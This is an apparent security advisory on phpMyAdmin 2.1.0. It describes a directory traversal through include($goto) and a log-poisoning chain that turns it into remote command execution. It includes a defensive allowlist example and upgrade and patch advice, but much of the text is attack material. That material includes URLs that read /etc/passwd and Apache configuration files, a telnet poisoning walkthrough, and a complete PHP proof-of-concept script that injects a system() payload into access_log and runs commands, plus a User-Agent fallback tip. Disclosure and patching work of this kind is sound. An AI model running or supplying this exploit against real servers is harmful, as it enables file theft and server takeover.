phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) is a PHP tool with a web-based interface for managing MySQL databases. Two vulnerabilities have been found in it. The newly released stable version, phpMyAdmin 2.2.0, is not affected and should be installed.
1. Directory traversal vulnerability
The attacker requests URLs such as:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
and can read any system file the web-server user is allowed to read.
The problematic code is:
'include ($goto);' in sql.php and in tbl_replace.php.
$goto is taken straight from the request (register_globals) and nothing restricts it to phpMyAdmin's own scripts. Because the file is passed to include() rather than merely read, any PHP code it contains is executed as well; that is what makes the second vulnerability possible.
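The vulnerable pattern beside an allowlisted replacement, as an added example. This is not phpMyAdmin's own code, nor the contents of the 2.2.0 fix or the SecureReality patch; the page names in the allowlist and the function names are assumptions made for the example.

```php
<?php
// Added example (not phpMyAdmin's own code): the vulnerable pattern from
// sql.php / tbl_replace.php beside an allowlisted replacement. The entries
// in $allowed are assumptions for the example, not phpMyAdmin's real list.

// Vulnerable form, as in phpMyAdmin 2.1.0 with register_globals on:
// $goto comes straight from the query string, so include() opens any file
// the web-server user can read and runs whatever PHP it contains.
function vulnerable_goto($goto)
{
    include($goto);
}

// Hardened form: $goto may only name one of the scripts phpMyAdmin itself
// redirects to, and it is always resolved relative to this directory.
function resolve_goto($goto)
{
    $allowed = array('main.php', 'db_details.php', 'tbl_properties.php', 'sql.php');

    if (!is_string($goto)) {
        return false;   // goto[]=... and other non-string input is rejected
    }
    // a redirect target may carry its own query string, e.g. "db_details.php?db=test"
    $script = strtok($goto, '?');
    if ($script === false || !in_array($script, $allowed, true)) {
        return false;   // /etc/passwd, ../x, a log file: all rejected
    }
    return dirname(__FILE__) . '/' . $script;
}

function safe_goto($goto)
{
    $path = resolve_goto($goto);
    if ($path === false) {
        $path = dirname(__FILE__) . '/main.php';   // fall back instead of trusting the input
    }
    include($path);
}

// The two URLs from the advisory are rejected; a legitimate target is kept.
assert(resolve_goto('/etc/passwd') === false);
assert(resolve_goto('/var/log/httpd/access_log') === false);
assert(resolve_goto(array('x')) === false);
assert(basename(resolve_goto('db_details.php?db=test')) === 'db_details.php');
```

The check compares the whole script name against a fixed list rather than filtering out "..", "/" or other characters: a deny-list of bad characters is easy to get wrong, while an allowlist of the handful of pages the application actually redirects to leaves no room for traversal or for including a log file.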
2. Code execution vulnerability
Combined with the include() above, the web-server log files give an attacker a way to execute arbitrary code on the affected server. The only requirement is that the log file be readable by the user PHP runs as (Apache writes the log itself, so it does not need to be writable by anyone else).
First, read the Apache configuration through the same hole to find where the log files are kept:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
In this case the configuration shows the logs are at:
/var/log/httpd/error_log
/var/log/httpd/access_log
Then telnet to port 80 and send a GET request whose request line carries PHP code. Apache records the request line in access_log as it was received, so the code ends up inside a file that include() will execute:
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^]'.
GET
^]
telnet> quit
Connection closed.
#
The PHP code is typed on the GET line itself (the transcript above shows only the word GET). The server's answer does not matter: the line is logged all the same, which is all the attacker needs.
Now the attacker can run commands remotely as the Apache user by including the poisoned log and passing the command in a further query parameter. The parameter name must match whatever the injected PHP code reads; here it is meters:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/access_log&btnDrop=No&meters=ls%20-l%20/
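The whole chain (poison access_log, then include it through sql.php) as an added example in the form of a PHP command-line script. It is not part of the original advisory: the host, the log path, the phpMyAdmin directory and the parameter name cmd are assumptions, and the marker trick that extracts the command output from the echoed log is an addition beyond what the advisory shows. The poisoning request is written to a raw socket on purpose: a browser or an HTTP library would URL-encode the PHP tags and the code would never reach the log intact.

```php
<?php
// Added example, not from the advisory: PoC for the log-poisoning chain.
// All names below are assumptions; run it only against a host you are
// authorised to test.
$target  = 'www.example.com';            // assumed target
$logFile = '/var/log/httpd/access_log';  // assumed, as read from httpd.conf
$param   = 'cmd';                        // GET parameter the injected code reads

// Step 1: poison the log. Apache writes the request line into access_log
// verbatim, so the "<?php ... ?>" survives. Only single quotes are used in
// the payload, because Apache escapes double quotes and backslashes when it
// logs them and an escaped quote would break the PHP parse.
function poison_log($host, $param)
{
    $payload = "<?php echo '@@'; system(\$_GET['$param']); echo '@@'; ?>";
    $fp = fsockopen($host, 80, $errno, $errstr, 10);
    if (!$fp) {
        die("connect failed: $errstr ($errno)\n");
    }
    fwrite($fp, "GET /$payload HTTP/1.0\r\nHost: $host\r\n\r\n");
    while (!feof($fp)) {
        fgets($fp);   // drain whatever the server answers; the line is logged regardless
    }
    fclose($fp);
}

// Step 2: make sql.php include() the poisoned log. The rest of the log is
// echoed back as plain text; the command output sits between the @@ markers.
function run_via_log($host, $logFile, $param, $cmd)
{
    $url = "http://$host/phpMyAdmin/sql.php?goto=" . rawurlencode($logFile)
         . "&btnDrop=No&$param=" . rawurlencode($cmd);
    $body = @file_get_contents($url);
    if ($body === false) {
        return false;   // 4xx/5xx or no connection
    }
    return preg_match('/@@(.*?)@@/s', $body, $m) ? $m[1] : $body;
}

if (PHP_SAPI === 'cli') {
    poison_log($target, $param);
    echo run_via_log($target, $logFile, $param, 'id; ls -l /'), "\n";
}
```

Every later request that includes the log re-executes the injected line, so poisoning once is enough. If the server rejects a request line containing spaces before logging it, the usual fallback is to place the same payload in the User-Agent header, which is logged when access_log uses the combined format.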
Affected systems:
phpMyAdmin 2.1.0
Solution:
1. Upgrade to phpMyAdmin 2.2.0:
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2. Or download and apply the patch:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
Excerpted from: 52w.net